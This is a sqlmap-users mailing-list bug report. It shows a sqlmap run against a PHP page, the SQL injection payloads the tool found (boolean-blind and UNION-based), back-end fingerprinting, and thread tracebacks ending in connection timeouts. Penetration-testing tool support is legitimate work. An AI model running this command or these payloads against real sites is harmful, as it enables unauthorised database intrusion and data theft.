| This Bug is from my laptops sqlmap with python 2.7 The other problem is on another PC with still python 2.6 ;) sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent --retries=6 --level 5 --risk 3 --common-tables -D Database Place: GET Parameter: s Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106 ,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND 'sOCX'='sOCX&p=48693 --- [04:52:32] [INFO] manual usage of GET payloads requires url encoding [04:52:32] [INFO] the back-end DBMS is MySQL web application technology: PHP 4.4.0, Apache 1.3.33 back-end DBMS: MySQL 4 [04:52:32] [INFO] checking table existence using items from 'C:\pentest\p\sqlmap.0.9-1\txt\comm on-tables.txt' [04:52:32] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] 3 [04:52:40] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fix ing problems with some collation issues) [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection timed out to the target url or prox y, sqlmap is going to retry the request [04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads) [04:53:38] [INFO] tried 88/3452 items (3%) [04:53:39] [WARNING] user aborted during common table existence check. sqlmap will display some tables only Exception in thread 1: Traceback (most recent call last): File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner self.run() File "C:\Python27\lib\threading.py", line 485, in run self.__target(*self.__args, **self.__kwargs) File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName))) File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression value = getValue(unescaper.unescape(_expression_), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon e=expectingNone) File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump) File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband output = unionUse(_expression_, unpack=unpack, dump=dump) File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse value = __oneShotUnionUse(_expression_, unpack) File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUni onUse page, headers = Request.queryPage(payload, content=True, raise404=False) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage page, headers = Connect.getPage(url="" get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent =silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo mpare) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage raise sqlmapConnectionException, warnMsg sqlmapConnectionException: unable to connect to the target url or proxy Exception in thread 2: Traceback (most recent call last): File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner self.run() File "C:\Python27\lib\threading.py", line 485, in run self.__target(*self.__args, **self.__kwargs) File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName))) File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression value = getValue(unescaper.unescape(_expression_), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon e=expectingNone) File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump) File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband output = unionUse(_expression_, unpack=unpack, dump=dump) File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse value = __oneShotUnionUse(_expression_, unpack) File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUni onUse page, headers = Request.queryPage(payload, content=True, raise404=False) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage page, headers = Connect.getPage(url="" get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent =silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo mpare) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in getPage return Connect.__getPageProxy(**kwargs) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in __getPageProxy return Connect.getPage(**kwargs) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage raise sqlmapConnectionException, warnMsg sqlmapConnectionException: connection timed out to the target url or proxy [04:53:55] [WARNING] no table(s) found tables: '{}' [04:53:55] [INFO] Fetched data logged to text files under 'C:\pentest\p\sqlmap.0.9-1\output\ [*] shutting down at: 04:53:55 |
------------------------------------------------------------------------------ EditLive Enterprise is the world's most technically advanced content authoring tool. Experience the power of Track Changes, Inline Image Editing and ensure content is compliant with Accessibility Checking. http://p.sf.net/sfu/ephox-dev2dev
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
